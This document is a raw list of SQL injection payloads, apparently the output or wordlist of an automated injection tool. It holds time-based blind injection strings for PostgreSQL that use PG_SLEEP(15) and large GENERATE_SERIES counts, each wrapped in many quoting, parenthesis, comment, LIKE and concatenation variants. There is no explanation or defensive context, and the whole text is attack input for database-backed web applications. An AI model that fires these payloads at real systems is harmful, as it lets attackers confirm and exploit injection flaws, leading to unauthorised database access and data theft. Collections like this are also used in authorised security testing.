".((('("),
'zorQ<'">bess
) AND 6194=(SELECT 6194 FROM PG_SLEEP(15))
') AND 6194=(SELECT 6194 FROM PG_SLEEP(15))
' AND 6194=(SELECT 6194 FROM PG_SLEEP(15))
" AND 6194=(SELECT 6194 FROM PG_SLEEP(15))
) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND (6837=6837
)) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ((8641=8641
))) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND (((6741=6741
 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))
') AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ('qsma'='qsma
')) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND (('nrSG'='nrSG
'))) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ((('LgeV'='LgeV
' AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND 'VpAl'='VpAl
') AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ('WIeU' LIKE 'WIeU
')) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND (('oCbG' LIKE 'oCbG
'))) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ((('IOFq' LIKE 'IOFq
' AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND 'OVoJ' LIKE 'OVoJ
") AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ("deiY"="deiY
")) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND (("GvGs"="GvGs
"))) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ((("HYWL"="HYWL
" AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND "lRJk"="lRJk
") AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ("gNel" LIKE "gNel
")) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND (("TXtn" LIKE "TXtn
"))) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ((("qhhu" LIKE "qhhu
" AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND "icSW" LIKE "icSW
%') AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ('%'='
%')) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND (('%'='
%'))) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ((('%'='
%' AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND '%'='
%") AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ("%"="
%")) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND (("%"="
%"))) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ((("%"="
%" AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND "%"="
%00') AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ('fXgg'='fXgg
%00')) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND (('DyDb'='DyDb
%00'))) AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND ((('VLTY'='VLTY
%00' AND 6194=(SELECT 6194 FROM PG_SLEEP(15)) AND 'bRqa'='bRqa
 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- ujHW
 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))# NAVE
') WHERE 2390=2390 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
") WHERE 4926=4926 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
) WHERE 7099=7099 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
' WHERE 8876=8876 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
" WHERE 3223=3223 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
 WHERE 4622=4622 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
')) AS ZfCg WHERE 1502=1502 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
")) AS Qype WHERE 9538=9538 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
)) AS LlrY WHERE 9988=9988 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
') AS Xzqw WHERE 6945=6945 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
") AS bvSq WHERE 9894=9894 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
) AS eZPW WHERE 7160=7160 AND 6194=(SELECT 6194 FROM PG_SLEEP(15))-- 
'||(SELECT 'oGdA' FROM DUAL WHERE 7662=7662 AND 6194=(SELECT 6194 FROM PG_SLEEP(15)))||'
'||(SELECT 'GJLt' WHERE 8520=8520 AND 6194=(SELECT 6194 FROM PG_SLEEP(15)))||'
'+(SELECT sBOj WHERE 7245=7245 AND 6194=(SELECT 6194 FROM PG_SLEEP(15)))+'
'+(SELECT 'Xwjm' WHERE 7684=7684 AND 6194=(SELECT 6194 FROM PG_SLEEP(15)))+'
' IN BOOLEAN MODE) AND 6194=(SELECT 6194 FROM PG_SLEEP(15))#
) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
') AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
' AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
" AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
)) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
))) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
')) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
'))) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
") AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
")) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
"))) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%') AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%')) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%'))) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%' AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%") AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%")) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%"))) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%" AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%00') AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%00')) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%00'))) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
%00' AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
') WHERE 2297=2297 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
") WHERE 9450=9450 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
) WHERE 4659=4659 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
' WHERE 5194=5194 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
" WHERE 5835=5835 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
 WHERE 4578=4578 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
')) AS uXfD WHERE 7967=7967 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
")) AS Zyuf WHERE 2845=2845 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
)) AS NuOp WHERE 6032=6032 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
') AS UCCp WHERE 6368=6368 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
") AS VdjZ WHERE 7933=7933 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
) AS WXCH WHERE 3128=3128 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
'||(SELECT 'SxzQ' FROM DUAL WHERE 7816=7816 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
'||(SELECT 'Lvbd' WHERE 6488=6488 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
'+(SELECT qmaM WHERE 6565=6565 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
'+(SELECT 'zRiD' WHERE 4530=4530 AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
' IN BOOLEAN MODE) AND 8097=(SELECT 8097 FROM PG_SLEEP(15))--
) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
') AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
' AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
" AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (6648=6648
)) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((8046=8046
))) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (((7957=7957
 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
') AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('IEUs'='IEUs
')) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('ZWbh'='ZWbh
'))) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('Rybq'='Rybq
' AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND 'pJVe'='pJVe
') AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('MlMS' LIKE 'MlMS
')) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('jYlf' LIKE 'jYlf
'))) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('Mtdh' LIKE 'Mtdh
' AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND 'GFyk' LIKE 'GFyk
") AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ("FNar"="FNar
")) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (("TWyt"="TWyt
"))) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((("rYkI"="rYkI
" AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND "kuvj"="kuvj
") AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ("ijlF" LIKE "ijlF
")) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (("FaOd" LIKE "FaOd
"))) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((("NQdV" LIKE "NQdV
" AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND "NlPB" LIKE "NlPB
%') AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('%'='
%')) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('%'='
%'))) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('%'='
%' AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND '%'='
%") AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ("%"="
%")) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (("%"="
%"))) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((("%"="
%" AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND "%"="
%00') AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('TRnK'='TRnK
%00')) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('ylqa'='ylqa
%00'))) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('lxrH'='lxrH
%00' AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND 'sHjU'='sHjU
 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- FUqV
 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))# EKwY
') WHERE 9723=9723 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
") WHERE 3821=3821 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
) WHERE 7949=7949 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
' WHERE 3204=3204 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
" WHERE 1981=1981 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
 WHERE 4017=4017 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
')) AS GMTw WHERE 2860=2860 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
")) AS PxAf WHERE 1154=1154 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
)) AS iToY WHERE 6348=6348 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
') AS peMI WHERE 2889=2889 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
") AS awyI WHERE 4944=4944 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
) AS VEIs WHERE 7246=7246 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
'||(SELECT 'CClk' FROM DUAL WHERE 8363=8363 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))||'
'||(SELECT 'EqFT' WHERE 3307=3307 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))||'
'+(SELECT FBHf WHERE 2756=2756 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))+'
'+(SELECT 'Gmuz' WHERE 3584=3584 AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))+'
' IN BOOLEAN MODE) AND 7582=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))#
) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
') AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
' AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
" AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
)) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
))) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
')) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'))) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
") AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
")) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
"))) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%') AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%')) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%'))) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%' AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%") AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%")) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%"))) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%" AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00') AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00')) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00'))) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00' AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
') WHERE 6006=6006 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
") WHERE 2399=2399 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
) WHERE 7841=7841 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
' WHERE 5696=5696 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
" WHERE 8963=8963 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
 WHERE 5595=5595 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
')) AS QreW WHERE 7448=7448 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
")) AS ZIZK WHERE 6762=6762 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
)) AS qBJd WHERE 6430=6430 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
') AS rPic WHERE 7253=7253 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
") AS shvk WHERE 6426=6426 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
) AS LJdE WHERE 4217=4217 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'||(SELECT 'EWVi' FROM DUAL WHERE 2293=2293 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'||(SELECT 'iPad' WHERE 5978=5978 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'+(SELECT FgAR WHERE 7673=7673 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'+(SELECT 'kfoS' WHERE 1723=1723 AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
' IN BOOLEAN MODE) AND 4222=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
(SELECT 3077 FROM PG_SLEEP(15))
(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
',(SELECT (CASE WHEN (8059=8059) THEN (SELECT 8059 FROM PG_SLEEP(15)) ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN (8059=8059) THEN (SELECT 8059 FROM PG_SLEEP(15)) ELSE 1/(SELECT 0) END))
',(SELECT (CASE WHEN (3196=3196) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN (3196=3196) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) ELSE 1/(SELECT 0) END))
